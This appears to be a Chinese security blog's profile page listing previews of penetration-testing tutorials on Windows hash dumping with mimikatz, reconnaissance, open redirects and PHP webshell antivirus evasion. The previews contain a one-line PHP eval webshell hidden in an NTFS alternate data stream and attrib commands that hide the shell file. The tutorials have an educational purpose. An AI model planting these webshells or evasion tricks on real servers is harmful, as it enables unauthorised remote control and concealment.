- 博客(8)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 内网渗透-获取WIN本地用户Hash
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码win系统密码Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理,两种密码的加密方式在这有介绍Win本地hash概念但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.
2020-10-27 16:24:21
2673
原创 信息搜集-敏感信息泄露
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途信息泄露敏感信息作用1.robots.txt2. .git敏感文件3.物理路径泄露4.报错页面敏感信息泄漏5.备份文件泄露6.目录浏览7.其他乱七八糟总结敏感信息什么是敏感信息:敏感信息包括但不限于:口令、密钥、证书、会话标识、License、隐私数据、授权凭据、个人数据等、程序文件、配置文件、日志文件、备份文件等敏感信息相当的重要,如果能发现大量敏感信息你就是赚了。当然还是要介绍一下每.
2020-10-20 10:12:55
2376
原创 信息搜集-目录扫描
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途目录扫描目录原理爆破工具1.御剑后台扫描工具2.burp3.dirbuster4.dirb5. 常见fuzz工具爬虫工具长亭rad浏览器爬虫总结目录网站目录本质上就是我们的文件夹,不同的文件夹放着不同的文件。进行目录扫描是为了扩大测试范围,找到更多能利用的点。原理1.爆破目录扫描最常见的就是通过一个字典进行爆破,字典的精准度决定了你扫描的完整度。爆破的好处是能让我们发现一些隐藏页面,.
2020-10-19 10:36:00
8227
1
原创 信息搜集-指纹识别
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途指纹识别指纹常用网站和插件1.云悉指纹2.GodEye3.指纹什么是WEB指纹参考人的指纹,每个的指纹是多种多样的,通过办身份证进行指纹收集,可以快速匹配分辨出个人信息。WEB应用也有自己的指纹网页中的关键字,特点文件的md5值,特征码,第三方插件和cms独有的目录文件等等。web指纹识别就是通过正则表达式匹配这些特殊信息,识别web应用程序的名称和版本,语言类型,第三方组件,从而收集.
2020-10-17 10:24:59
2511
1
原创 信息搜集-子域名挖掘
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途子域名挖掘域名收集原理网站和工具1.在线子域名查询https://phpinfo.me/domain/2.一会儿~ https://dns.bufferover.run/dns?q=3. https://dnsdumpster.com/4.快速DNS rapiddns.io/subdomain5.crt.sh 证书查询4.Layer子域名挖掘机总结域名域名有级别之分,可以分为顶级域名(一级域.
2020-10-16 16:44:21
5509
3
原创 URL重定向-跳转绕过
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途URL重定向-跳转绕过URL重定向一般利用点利用姿势修复URL重定向服务端未对传入的跳转url变量进行检查和控制,可能导致可恶意构造任意一个恶意地址,诱导用户跳转到恶意网站。这个漏洞有啥危害呢????????我们普通人当看到一个网址,发现网站开头是自己熟悉(百度,谷歌)或者某一官网(感觉很安全的网址),就会没防护意识的点入进去,当该网站有url跳转漏洞,就会引导你跳转到一个不安全的网站,.
2020-10-15 15:08:03
18201
原创 PHP一句话木马免杀(3)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结免杀小技巧1.ADS隐藏。windows数据流有个很好的方式隐藏数据。通过命令行echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg会在本地生成一个shell.php文件,但打开却发现没有内容.
2020-10-14 10:15:29
1105
1
原创 PHP一句话木马免杀(2)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马,也称不死马。小结免杀小技巧1.隐藏php文件。在windows下有个attrib命令,能够帮助我们实现文件的隐藏。atttrib +s +a +h +r shell.php #隐藏atttrib -s -a -h -r shell.php #显示2.逻辑判断木马<? @eval.
2020-10-14 09:54:32
850
Yaazhini Setup 0.0.7.exe
2020-04-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人